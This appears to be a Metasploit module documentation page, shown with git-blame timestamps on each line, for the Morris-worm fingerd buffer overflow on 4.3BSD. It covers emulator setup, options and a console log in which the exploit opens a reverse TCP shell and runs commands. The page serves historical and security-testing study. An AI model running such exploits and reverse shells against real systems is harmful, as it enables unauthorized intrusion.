2020-02-06 15:01:58 -06:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
|
|
|
|
### Description
|
2018-10-04 02:38:53 -05:00
|
|
|
|
|
|
|
|
This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.
|
2020-02-05 17:21:47 -06:00
|
|
|
|
2018-10-04 02:38:53 -05:00
|
|
|
This vulnerability was exploited by the Morris worm in 1988-11-02.
|
|
|
|
|
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.
|
|
|
|
|
|
2020-02-06 15:01:58 -06:00
|
|
|
### Setup
|
2018-10-04 02:38:53 -05:00
|
|
|
|
2018-10-12 02:11:42 -05:00
|
|
|
A Docker environment for 4.3BSD on VAX is available at
|
|
|
|
|
<https://github.com/wvu/ye-olde-bsd>.
|
|
|
|
|
|
2018-10-04 02:38:53 -05:00
|
|
|
For manual setup, please follow the Computer History Wiki's
|
|
|
|
|
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
|
|
|
|
|
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
|
|
|
|
|
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
|
|
|
|
|
|
2020-02-06 15:01:58 -06:00
|
|
|
### Targets
|
2018-10-04 02:38:53 -05:00
|
|
|
|
|
|
|
|
```
|
|
|
|
|
Id Name
|
|
|
|
|
-- ----
|
|
|
|
|
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
|
|
|
|
|
```
|
|
|
|
|
|
2020-02-06 15:01:58 -06:00
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
Follow [Setup](#setup) and [Scenarios](#scenarios).
|
|
|
|
|
|
2018-10-04 02:38:53 -05:00
|
|
|
## Options
|
|
|
|
|
|
|
|
|
|
**RPORT**
|
|
|
|
|
|
|
|
|
|
Set this to the target port. The default is 79 for `fingerd`, but the
|
|
|
|
|
port may be forwarded when NAT (SLiRP) is used in SIMH.
|
|
|
|
|
|
|
|
|
|
**PAYLOAD**
|
|
|
|
|
|
2020-02-05 17:21:47 -06:00
|
|
|
Set this to a BSD VAX payload. Currently, only
|
2018-10-04 02:38:53 -05:00
|
|
|
`bsd/vax/shell_reverse_tcp` is supported.
|
|
|
|
|
|
2020-02-06 15:01:58 -06:00
|
|
|
## Scenarios
|
|
|
|
|
|
|
|
|
|
### `fingerd` 5.1 on 4.3BSD
|
2018-10-04 02:38:53 -05:00
|
|
|
|
|
|
|
|
```
|
2020-02-06 15:01:58 -06:00
|
|
|
msf5 > use exploit/bsd/finger/morris_fingerd_bof
|
|
|
|
|
msf5 exploit(bsd/finger/morris_fingerd_bof) > show missing
|
2018-10-04 02:38:53 -05:00
|
|
|
|
|
|
|
|
Module options (exploit/bsd/finger/morris_fingerd_bof):
|
|
|
|
|
|
|
|
|
|
Name Current Setting Required Description
|
|
|
|
|
---- --------------- -------- -----------
|
2020-02-06 15:01:58 -06:00
|
|
|
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
2018-10-04 02:38:53 -05:00
|
|
|
|
|
|
|
|
|
|
|
|
|
Payload options (bsd/vax/shell_reverse_tcp):
|
|
|
|
|
|
|
|
|
|
Name Current Setting Required Description
|
|
|
|
|
---- --------------- -------- -----------
|
2020-02-06 15:01:58 -06:00
|
|
|
LHOST yes The listen address (an interface may be specified)
|
2018-10-04 02:38:53 -05:00
|
|
|
|
2020-02-06 15:01:58 -06:00
|
|
|
msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
|
|
|
|
|
rhosts => 127.0.0.1
|
|
|
|
|
msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1
|
|
|
|
|
lhost => 192.168.56.1
|
2018-10-04 02:38:53 -05:00
|
|
|
msf5 exploit(bsd/finger/morris_fingerd_bof) > run
|
|
|
|
|
|
2020-02-06 15:01:58 -06:00
|
|
|
[*] Started reverse TCP handler on 192.168.56.1:4444
|
2018-10-04 02:38:53 -05:00
|
|
|
[*] 127.0.0.1:79 - Connecting to fingerd
|
|
|
|
|
[*] 127.0.0.1:79 - Sending 533-byte buffer
|
2020-02-06 15:01:58 -06:00
|
|
|
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58015) at 2020-02-06 15:45:33 -0600
|
2018-10-04 02:38:53 -05:00
|
|
|
|
2020-02-06 15:01:58 -06:00
|
|
|
who am i
|
|
|
|
|
nobody tty?? Feb 6 13:45
|
2018-10-04 02:38:53 -05:00
|
|
|
cat /etc/motd
|
|
|
|
|
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986
|
|
|
|
|
|
|
|
|
|
Would you like to play a game?
|
|
|
|
|
```
|
